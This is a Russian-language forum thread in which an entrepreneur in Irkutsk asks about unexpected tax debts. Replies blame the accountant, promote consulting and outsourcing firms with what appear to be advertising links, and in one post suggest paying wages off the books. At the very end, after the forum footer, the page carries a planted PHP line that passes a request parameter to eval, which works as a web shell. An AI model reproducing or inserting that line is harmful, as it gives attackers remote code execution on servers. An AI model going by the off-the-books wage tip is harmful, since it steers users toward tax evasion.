+ Ответить в теме
Показано с 1 по 6 из 6

Тема: Налоговые долги ИП


  1. #1

    Налоговые долги ИП

    Непонятно откуда у меня возникли налоговые долги, я как ИП работают в Иркутске уже несколько лет и никогда раньше такого не было. Внятного ответа от налоговой добиться не могу. Сумма там не маленькая, может подскажите что делать в такой случае?

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    Может быть такое что бухгалтер с которым вы сотрудничали, как-то напортачил, я бы наверное его вообще убил бы. А может быть еще хуже - он вас оборовывал, хотя вменяемый человек будет понимать, что рано или поздно его поймают за этим.

  3. #3
    Цитата Сообщение от Serf Посмотреть сообщение
    Может быть такое что бухгалтер с которым вы сотрудничали, как-то напортачил, я бы наверное его вообще убил бы. А может быть еще хуже - он вас оборовывал, хотя вменяемый человек будет понимать, что рано или поздно его поймают за этим.
    Это уже какие-то фантазии, я думаю лучше тут все гораздо проще. Скорее всего автор темы упустил некоторые моменты в налоговой и не оплачивал их, а потом когда стали начисляться пеня, сильно удивился. Тут просто надо разобраться с бухгалтером.

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Вам проще будет обратиться в консалтинговую компанию, которая решают самые разные проблемы в бизнесе, в том числе и с связанные с налогообложением ИП, например - https://konsalting38.ru/ . Таких компаний вообще много, и в Иркутске тоже, так что думаю есть смысл проконсультироваться с несколькими, а потом уже думать на счет того, к кому лучше обращаться.

  5. #5
    Мимо проходил Alexru84 is on a distinguished road Аватар для Alexru84
    Регистрация
    21.04.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    15
    Проще платить черную зп)) сейчас все в основном так делают )

  6. #6
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    В связи с новой ситуацией в стране, пришлось уволить часть сотрудников, а некоторые ушли сами. В том числе нас покинул бухгалтер и наученный опытом, я нанял бухгалтера удаленно https://fkugroup.ru/ в этой аутсорсинговой компании. По факту он занимается тем же, чем и штатный сотрудник, но только делает свою работу даже качественнее, а цена за услуги ниже, чем зарплата. Здесь действительно работают профессионалы своего дела, так как никаких штрафов или проблем со стороны налоговой я не наблюдаю в течение всего нашего сотрудничества.

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}